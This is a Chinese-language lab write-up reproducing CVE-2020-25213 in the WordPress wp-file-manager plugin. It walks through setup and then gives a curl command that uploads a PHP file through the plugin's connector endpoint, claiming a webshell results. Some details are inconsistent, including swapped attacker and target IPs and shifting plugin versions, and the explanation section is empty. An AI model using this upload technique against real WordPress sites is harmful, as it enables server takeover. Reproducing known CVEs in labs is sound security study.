CVE-2020-25213 WordPress远程代码执行漏洞复现
0x00 漏洞介绍
WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。而WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在安全漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。
0x01 漏洞环境
- 攻击机:192.168.75.178 kali-2021
- 目标机+网站管理员:192.168.91.137 Ubuntu 18.04 server64
- 工具:https://192.168.91.137:10000、火狐浏览器(CSRF漏洞复现时,不能使用谷歌浏览器,谷歌浏览器自带屏蔽CSRF)
- wp-file-manager版本:6.9
0x02 漏洞搭建
1、下载wordpress和插件
wordpress:https://wordpress.org/download/
file-manager6.0:https://wordpress.org/plugins/wp-file-manager/advanced/

2、然后搭建数据库、添加写入权限,注册管理员账号密码等完成安装
username:wordpress
password:vJknM3*1XtUBrqy3eU

3、加载插件,直接将插件拖入到网站根目录解压

4、在网站激活

0x03 影响范围
WordPress 文件管理器(wp-file-manager)插件 6.0-6.8 版本
0x04 漏洞条件
Wordpress CMS、php、mysql版本没限制,只要能搭建起来网站,并且插件的版本在6.0-6.8即可
0x05 漏洞原理
0x06 漏洞复现
1、访问http://192.168.75.178/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php出现{"error":["errUnknownCmd"]}即漏洞存在

2、新建一个test.php,内容为<?php phpinfo()?>
cd Desktop
echo "<?php phpinfo()?>" > test.php

3、之后在终端输入下面的命令:
curl -F cmd=upload -F target=l1_ -F upload[]=@test.php -XPOST "http://192.168.75.178/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

4、访问下面的链接,成功获得webshell
http://192.168.75.178/wp-content/plugins/wp-file-manager/lib/files/test.php

0x07 漏洞修复建议
升级插件版本即可

浙公网安备 33010602011771号